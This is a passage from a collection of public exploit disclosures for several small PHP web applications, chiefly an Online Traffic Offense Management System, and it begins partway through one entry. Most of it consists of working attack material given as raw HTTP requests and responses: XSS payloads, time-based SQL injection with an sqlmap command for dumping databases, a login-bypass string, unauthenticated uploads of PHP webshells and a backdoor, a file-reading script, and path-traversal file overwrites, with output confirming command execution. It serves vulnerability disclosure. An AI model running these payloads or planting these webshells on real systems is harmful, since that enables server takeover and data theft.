# Request using POST method, payload is in the parameter value id

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"

13<script>alert(1)</script>37
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"

hacked
[...]

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8

UPDATE users set  firstname = 'sdasfd'  ,  lastname = 'fdxfd'  ,  username = 'test2'  ,  `password` = 'ad0234829205b9033196ba818f7a872b'  where id = 13<script>alert(1)</script>37

-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the parameter value id

GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# XSS Stored

# Save JS payload in user profile and add SVG file from vuln script

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"

1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"

admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"

admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

[...]SVG PAYLOAD[...]


-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# Request download new user data

GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719
[...]
			<div class="form-group col-6">
					<label for="name">First Name</label>
					<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
				</div>
				<div class="form-group col-6">
					<label for="name">Last Name</label>
					<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
				</div>
[...]
			<div class="form-group col-6 d-flex justify-content-center">
					<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
				</div>
[...]
HireHackking 
# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Exploit Author: Yash Mahajan 
# Date: 2021-10-07
# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
# Version: 1
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
# Tested On: Windows 10, XAMPP 
# Vulnerable Parameter: searchifsccode 

Steps to Reproduce:

1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite.
2) Paste below request into burp repeater and also create a txt file and paste this request.

Request:
========
POST /ifscfinder/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ifscfinder/
Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=

--------------------------------------------------------------------------------
3) You will see a time delay of 20 Sec in response.
4) python sqlmap.py -r request.txt -p searchifsccode --dbs
5) We can retrieve all databases using above sqlmap command
HireHackking 
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution

# All requests can be sent by both an authenticated and a non-authenticated user

# RCE - we can exploit the RCE vulnerability in several ways:

* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
  
* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
  
* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user

* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user

* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Request send as Unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"


-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\

GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /traffic_offense/uploads</title>
 </head>
 <body>
<h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a>  </td><td align="right">2021-08-19 09:24  </td><td align="right"> 11K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58  </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a>     </td><td align="right">2021-10-07 07:31  </td><td align="right">3.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a>     </td>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09    <DIR>          .
07.10.2021  10:09    <DIR>          ..
19.08.2021  09:24            11ÿ426 1629336240_avatar.jpg
20.08.2021  08:58             5ÿ288 1629421080_tl-logo.png
07.10.2021  07:31             3ÿ451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02    <DIR>          drivers
               5 File(s)         20ÿ669 bytes
               3 Dir(s)  86ÿ494ÿ085ÿ120 bytes free
</pre>
</BODY></HTML>

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Webshell as System Logo and next webshell as Potal Cover in System Information page

# Request

POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

<?php

if($_GET['file']) {
	$fichero=$_GET['file']; 
	} else {
	$fichero="/";
	} 

if($handle = @opendir($fichero)) {
  while($filename = readdir($handle)) {
    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
  closedir($handle);
  } else {
  echo "FILE: " . $fichero . "<br><hr><pre>";
  $fp = fopen($fichero, "r");
  $buffer = fread($fp, filesize($fichero));
  echo $buffer;
  fclose($fp);
  }

?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3

# Webshell as photo in driver list page

# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell

GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<pre>desktop-uhrf0c6\hubert
</pre>
HireHackking 
# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Mevlüt Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/entrance_exam/admin/login.php
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /entrance_exam/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/entrance_exam/admin/login.php
Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n

username=admin'+or+'1'%3D'1&password=anything
HireHackking 
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilage escalation

# All requests can be sent by both an authenticated and a non-authenticated user

# The vulnerabilities in the application allow for:

* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files in server
* Performing operations by an unauthenticated user with application administrator rights

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - Reading any PHP file from the server

Example vuln scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading rrr.php file from other user in serwer

GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
[...]
</br></br>Hacked file other user in serwer!</br></br>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2 - Saving files to parent and child directories and overwriting files in server

# Request to read file 

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
  	<title>Online Traffic Offense Management System - PHP</title>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite file index.php in main directory webapp

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

<?php
echo "Hacked other client files in this hosting!";
?>
-----------------------------329606699635951312463334027403--

# New file have extention as this write filename="fuzzdb.php"
# New file have name and locate 5/../../../index we can save file in other directory ;)
# Line must start digit
# We can rewrite config files

-----------------------------------------------------------------------------------------------------------------------
# Respopnse

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
